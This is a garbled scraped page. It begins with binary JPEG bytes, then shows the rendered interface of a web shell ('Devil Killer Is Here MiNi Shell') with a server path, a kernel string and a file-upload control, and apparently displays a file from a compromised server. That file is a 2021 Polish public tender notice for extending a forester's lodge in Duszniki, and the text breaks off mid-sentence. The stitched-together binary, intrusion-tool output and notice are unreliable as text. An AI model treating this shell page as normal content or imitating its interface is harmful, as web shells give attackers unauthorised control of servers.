JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210701/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210701/0010064201-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00100642 z dnia 2021-07-01</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> „Rozbudowa i przebudowa leśniczówki na potrzeby kancelarii leśnictwa Duszniki” – IV postępowanie </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Skarb Państwa - Państwowe Gospodarstwo Leśne Lasy Państwowe Nadleśnictwo Pniewy</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Nadleśnictwo Pniewy</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 630011480</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Turowska 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Pniewy</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">62-045</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">wielkopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL418 - Poznański</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">61 29 36 420</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">61 29 36 435</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">pniewy@poznan.lasy.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://pniewy.poznan.lasy.gov.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inna państwowa jednostka organizacyjna nieposiadająca osobowości prawnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Środowisko</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Rozbudowa i przebudowa leśniczówki na potrzeby kancelarii leśnictwa Duszniki” – IV postępowanie </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-20168678-d419-11eb-911f-9ad5f74c2a25</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00100642</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-07-01</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00054286/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.1 Rozbudowa i przebudowa leśniczówki na potrzeby kancelarii leśnictwa Duszniki</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://pniewy.poznan.lasy.gov.pl/aktualnosci <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">miniportal.uzp.gov.pl poprzez zakładkę „Formularze do komunikacji”.2. Zamawiający<br/>będzieprzekazywał Wykonawcom informacje w formie elektronicznej za pośrednictwem adresu e-mail<br/>lub miniportal.uzp.gov.plpoprzez zakładkę „Formularze do komunikacji” Korespondencja, której<br/>zgodnie z obowiązującymi przepisami adresatem jest konkretny wykonawca, będzie przekazywana w<br/>formie elektronicznej za pośrednictwem miniportal.uzp.gov.pl poprzez zakładkę „Formularze do<br/>komunikacji” do tego Wykonawcy.3. Wykonawca jako podmiot profesjonalny ma obowiązek<br/>sprawdzania komunikatów i wiadomości bezpośrednio na miniportal.uzp.gov.pl przesłanych przez<br/>zamawiającego, gdyż system powiadomień może ulec awarii lub powiadomienie może trafić do folderu<br/>SPAM.4. Zamawiający, zgodnie z Rozporządzeniem Prezesa Rady Ministrów z dnia 31 grudnia 2020r.<br/>w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla<br/>dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie<br/>zamówienia publicznego lub konkursie (Dz. U. z 2020r. poz. 2452), określa niezbędne wymagania<br/>sprzętowo - aplikacyjne możliwiające pracę na miniportal.uzp.gov.pl tj.:1) stały dostęp do sieci Internet<br/>o gwarantowanejprzepustowości nie mniejszej niż 512 kb/s,2) komputer klasy PC lub MAC o<br/>następującej konfiguracji:pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja,<br/>jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje,3)<br/>zainstalowana dowolna przeglądarka internetowa, w przypadku Internet Explorer minimalnie wersja 10<br/>0.,4) zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf,5.<br/>Zamawiający nie ponosi odpowiedzialności za złożenie oferty w sposób niezgodny z Instrukcją<br/>korzystania z miniportal.uzp.gov.pl w szczególności za sytuację, gdy zamawiający zapozna się z<br/>treścią oferty przed upływem terminu składania ofert. Taka oferta zostanie uznana przez<br/>Zamawiającego za ofertęhandlową i nie będzie brana pod uwagę w przedmiotowym postępowaniu<br/>ponieważ nie został spełniony obowiązek narzucony w art. 221 Ustawy Prawo Zamówień<br/>Publicznych.6. Zamawiający informuje, że instrukcje korzystania z miniportal.uzp.gov.pl dotyczące w<br/>szczególności logowania, składaniawniosków o wyjaśnienie treści SWZ, składania ofert oraz innych<br/>czynności podejmowanych w niniejszym postępowaniu przy użyciu miniportal.uzp.gov.pl znajdują się w<br/>zakładce „Instrukcje" na stronie internetowej pod adresem: https://miniportal.uzp.gov.pl/Instrukcje 7.<br/>Zamawiający rekomenduje Ogłoszenie nr 2021/BZP 00018210/01 z dnia 2021-03-16 2021-03-16<br/>Ogłoszenie nr 2021/BZP 00035571/01 z dnia 2021-04-19<br/>2021-04-19 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy - Roboty budowlane<br/>Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie<br/>podstawowym na podstawie: art. 275 pkt 1 ustawy - Dostawy wykorzystanie formatów: .pdf .doc .xls<br/>.jpg (.jpeg) ze szczególnym wskazaniem na .pdf8. W celu ewentualnej kompresji danych Zamawiający<br/>rekomenduje wykorzystanie jednego z formatów: zip, 7Z9. Zamawiający zwraca uwagę na<br/>ograniczenia wielkości plików podpisywanych profilem zaufanym, który wynosi max 10MB, oraz na<br/>ograniczenie wielkości plików podpisywanych w aplikacji eDoApp służącejdo składania podpisu<br/>osobistego, który wynosi max 5MB.10. Ze względu na niskie ryzyko naruszeniaintegralności pliku oraz<br/>łatwiejszą weryfikację podpisu, zamawiający zaleca, w miarę możliwości, przekonwertowanie plików<br/>składających się na ofertę na format .pdf i opatrzenie ich podpisem kwalifikowanym PAdES. 11.<br/>Postępowanie prowadzone jest w języku polskim w formie elektronicznejza pośrednictwem<br/>https://miniportal.uzp.gov.pl</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Stosownie do art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych osobowych) (Dz. Urz. UE L<br/>119 z 04 maja 2016 r., str. 1 – „RODO”) Zamawiający informuje, iż administratorem danych osobowych<br/>jest Skarb Państwa Państwowe Gospodarstwo Leśne Nadleśnictwo Pniewy z siedzibą w Pniewach, ul.<br/>Turowska 1, 62-045 Pniewy . Administrator wyznaczył Inspektora Ochrony Danych Osobowych p.<br/>Monikę Kowalik, z którym w sprawach dotyczących przetwarzania danych osobowych można<br/>skontaktować się za pośrednictwem poczty elektronicznej pod adresem iod@comp-net.pl.2.<br/>Zamawiający przetwarza dane osobowe zebrane w niniejszym postępowaniu o udzielenie zamówienia<br/>publicznego w sposób gwarantujący zabezpieczenie przed ich bezprawnym rozpowszechnianiem.3.<br/>Zamawiający udostępnia dane osobowe, o których mowa w art. 10 RODO w celu umożliwienia<br/>korzystania ze środków ochrony prawnej, o których mowa w dziale VI PZP do upływu terminu do ich<br/>wniesienia.4. Do przetwarzania danych osobowych, o których mowa w art. 10 RODO mogą być<br/>dopuszczone wyłącznie osoby posiadające upoważnienie. Osoby dopuszczone do przetwarzania<br/>takich danych są obowiązane do zachowania ich w poufności5. Dane osobowe przetwarzane będą na<br/>podstawie art. 6 ust. 1 lit. c RODO w celu związanym z prowadzeniem niniejszego postępowania o<br/>udzielenie zamówienia publicznego oraz jego rozstrzygnięciem, jak również, jeżeli nie ziszczą się<br/>przesłanki określone w art. 254 pkt 2 PZP – w celu zawarcia umowy w sprawie zamówienia<br/>publicznego oraz jej realizacji, a takżeudokumentowania postępowania o udzielenie zamówienia i jego<br/>archiwizacji.6. Odbiorcami danych osobowych będą osoby lub podmioty, którym dokumentacja<br/>postępowania zostanie udostępniona w oparciu o art. 74 PZP.7. Dane osobowe pozyskane w związku<br/>z prowadzeniem niniejszego postępowania o udzielenie zamówienia publicznego będą<br/>przechowywane, zgodnie z art. 78 PZP, przez okres 4 lat od dnia zakończenia postępowania o<br/>udzielenie zamówienia publicznego, a jeżeli czas trwania umowy przekracza 4 lata, okres<br/>przechowywania obejmuje cały czas trwania umowy w sprawie zamówienia publicznego.8. Niezależnie<br/>od postanowień pkt 7. powyżej, w przypadku zawarcia umowy w sprawie zamówienia publicznego,<br/>dane osobowe będą przetwarzane do upływu okresu przedawnienia roszczeń wynikających z umowy<br/>w sprawie zamówienia publicznego.9. Dane osobowe pozyskane w związku z prowadzeniem<br/>niniejszego postępowania o udzielenie zamówienia mogą zostać przekazane podmiotom świadczącym<br/>usługi doradcze, w tym usługi prawne, i konsultingowe,10. Stosownie do art. 22 RODO, decyzje<br/>dotyczące danych osobowych nie będą podejmowane w sposób zautomatyzowany.dalsza część w<br/>SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Stosownie do art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych osobowych) (Dz. Urz. UE L<br/>119 z 04 maja 2016 r., str. 1 – „RODO”) Zamawiający informuje, iż administratorem danych osobowych<br/>jest Skarb Państwa Państwowe Gospodarstwo Leśne Nadleśnictwo Pniewy z siedzibą w Pniewach, ul.<br/>Turowska 1, 62-045 Pniewy . Administrator wyznaczył Inspektora Ochrony Danych Osobowych p.<br/>Monikę Kowalik, z którym w sprawach dotyczących przetwarzania danych osobowych można<br/>skontaktować się za pośrednictwem poczty elektronicznej pod adresem iod@comp-net.pl.2.<br/>Zamawiający przetwarza dane osobowe zebrane w niniejszym postępowaniu o udzielenie zamówienia<br/>publicznego w sposób gwarantujący zabezpieczenie przed ich bezprawnym rozpowszechnianiem.3.<br/>Zamawiający udostępnia dane osobowe, o których mowa w art. 10 RODO w celu umożliwienia<br/>korzystania ze środków ochrony prawnej, o których mowa w dziale VI PZP do upływu terminu do ich<br/>wniesienia.4. Do przetwarzania danych osobowych, o których mowa w art. 10 RODO mogą być<br/>dopuszczone wyłącznie osoby posiadające upoważnienie. Osoby dopuszczone do przetwarzania<br/>takich danych są obowiązane do zachowania ich w poufności5. Dane osobowe przetwarzane będą na<br/>podstawie art. 6 ust. 1 lit. c RODO w celu związanym z prowadzeniem niniejszego postępowania o<br/>udzielenie zamówienia publicznego oraz jego rozstrzygnięciem, jak również, jeżeli nie ziszczą się<br/>przesłanki określone w art. 254 pkt 2 PZP – w celu zawarcia umowy w sprawie zamówienia<br/>publicznego oraz jej realizacji, a takżeudokumentowania postępowania o udzielenie zamówienia i jego<br/>archiwizacji.6. Odbiorcami danych osobowych będą osoby lub podmioty, którym dokumentacja<br/>postępowania zostanie udostępniona w oparciu o art. 74 PZP.7. Dane osobowe pozyskane w związku<br/>z prowadzeniem niniejszego postępowania o udzielenie zamówienia publicznego będą<br/>przechowywane, zgodnie z art. 78 PZP, przez okres 4 lat od dnia zakończenia postępowania o<br/>udzielenie zamówienia publicznego, a jeżeli czas trwania umowy przekracza 4 lata, okres<br/>przechowywania obejmuje cały czas trwania umowy w sprawie zamówienia publicznego.8. Niezależnie<br/>od postanowień pkt 7. powyżej, w przypadku zawarcia umowy w sprawie zamówienia publicznego,<br/>dane osobowe będą przetwarzane do upływu okresu przedawnienia roszczeń wynikających z umowy<br/>w sprawie zamówienia publicznego.9. Dane osobowe pozyskane w związku z prowadzeniem<br/>niniejszego postępowania o udzielenie zamówienia mogą zostać przekazane podmiotom świadczącym<br/>usługi doradcze, w tym usługi prawne, i konsultingowe,10. Stosownie do art. 22 RODO, decyzje<br/>dotyczące danych osobowych nie będą podejmowane w sposób zautomatyzowany.dalsza część w<br/>SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">SA.270.4.8.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 280000,00 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest wykonanie robót budowlanych pn. „Rozbudowa i przebudowa<br/>leśniczówki na potrzeby kancelarii leśnictwa Duszniki” – w budynku zlokalizowanym w<br/>Dusznikach, ul. Młynkowska 9, 64-550 Duszniki (dz. nr 80344/1 Duszniki, obręb 0604 Duszniki,<br/>jedn. ewid. 302402_2 Duszniki). Roboty budowlane obejmują rozbudowę i przebudowę budynku mieszkalnego jednorodzinnego w tym:- rozbiórkę istniejącego tarasu wraz ze schodami<br/>zewnętrznymi oraz rozbiórkę zewnętrznego zejścia do piwnicy,- budowę nowego budynku w<br/>miejscu dotychczasowego tarasu – rozbudowę terenu wraz ze schodami zewnętrznymi i<br/>pochylnią dla osób niepełnosprawnych,- przebudowę i rozbudowę istniejących instalacji<br/>wewnątrz budynku, umożliwiającą podłączenie nowoprojektowanej części budynku do instalacji<br/>istniejących (instalacja wodna, kanalizacji sanitarnej, elektryczna, c.o., telekomunikacyjna)-<br/>instalację alarmową w części rozbudowywanej,- tereny utwardzone wraz z wyznaczonymi<br/>miejscami postojowymi oraz wyznaczonym miejscem do gromadzenia odpadów,- wycinkę<br/>drzewa kolidującego z planowaną inwestycją.Rozbudowa budynku mieszkalnego<br/>jednorodzinnego (leśniczówka Leśnictwa Duszniki) polegać będzie na budowie nowego budynku<br/>zawierającego pomieszczenia kancelarii, co umożliwi samodzielne jej funkcjonowanie. Projektuje<br/>się rozbudowę istniejącego budynku mieszkalnego od strony południowej. Projekt ma także na<br/>celu dostosowanie obiektu kancelarii leśnictwa Duszniki do potrzeb osób niepełnosprawnych,<br/>dlatego zakłada się dobudowę pomieszczeń kancelarii wraz z osobnym wejściem,<br/>przystosowanym do potrzeb tych osób (zewnętrzne pochylnie). Rodzaj planowanych<br/>pomieszczeń, ich powierzchnia oraz wyposażenie jest dostosowane do wymagań zawartych w<br/>Zarządzeniu nr 79 Dyrektora Generalnego Lasów Państwowych z dnia 3 listopada 2015 r. w<br/>sprawie określenia standardu pomieszczeń biurowych leśnictwa, a także ich wyposażenia<br/>(załącznik nr 18). Projektuje się budynek murowany w kształcie prostokąta z przeszklonym<br/>wiatrołapem (konstrukcja aluminiowa – ogród zimowy), parterowy o dachu dwuspadowym,<br/>pokrytym blachodachówką modułową. Forma i funkcja planowanej rozbudowy budynku są<br/>zgodne z wymaganiami zawartymi w decyzji o pozwoleniu na budowę. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45210000-2 - Roboty budowlane w zakresie budynków</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45111220-6 - Roboty w zakresie usuwania gruzu</p> <p class="mb-0">45111300-1 - Roboty rozbiórkowe</p> <p class="mb-0">45112420-5 - Kopanie piwnic</p> <p class="mb-0">45211100-0 - Roboty budowlane w zakresie domów</p> <p class="mb-0">45220000-5 - Roboty inżynieryjne i budowlane</p> <p class="mb-0">45223100-7 - Montaż konstrukcji metalowych</p> <p class="mb-0">45223220-4 - Roboty zadaszeniowe</p> <p class="mb-0">45223500-1 - Konstrukcje z betonu zbrojonego</p> <p class="mb-0">45233123-7 - Roboty budowlane w zakresie dróg podrzędnych</p> <p class="mb-0">45233260-9 - Roboty budowlane w zakresie dróg pieszych</p> <p class="mb-0">45311000-0 - Roboty w zakresie okablowania oraz instalacji elektrycznych</p> <p class="mb-0">45311200-2 - Roboty w zakresie instalacji elektrycznych</p> <p class="mb-0">45312000-7 - Instalowanie systemów alarmowych i anten</p> <p class="mb-0">45330000-9 - Roboty instalacyjne wodno-kanalizacyjne i sanitarne</p> <p class="mb-0">45331100-7 - Instalowanie centralnego ogrzewania</p> <p class="mb-0">45332300-6 - Roboty instalacyjne kanalizacyjne</p> <p class="mb-0">45332400-7 - Roboty instalacyjne w zakresie urządzeń sanitarnych</p> <p class="mb-0">45400000-1 - Roboty wykończeniowe w zakresie obiektów budowlanych</p> <p class="mb-0">45410000-4 - Tynkowanie</p> <p class="mb-0">45421000-4 - Roboty w zakresie stolarki budowlanej</p> <p class="mb-0">45421130-4 - Instalowanie drzwi i okien</p> <p class="mb-0">45430000-0 - Pokrywanie podłóg i ścian</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">109 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Za najkorzystniejszą zostanie uznana oferta, która uzyska najwięcej<br/>punktów w określonych powyżej kryteriach oceny ofert.5. W sytuacji, gdy Zamawiający nie będzie mógł<br/>dokonać wyboru najkorzystniejszej oferty ze względu na to, że zostały złożone oferty o takiej samej<br/>cenie, wezwie on Wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym przez<br/>Zamawiającego ofert dodatkowych zawierających nową cenę. Wykonawcy, składając oferty<br/>dodatkowe, nie mogą zaoferować cen wyższych niż zaoferowane w uprzednio złożonych przez nich<br/>ofertach.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 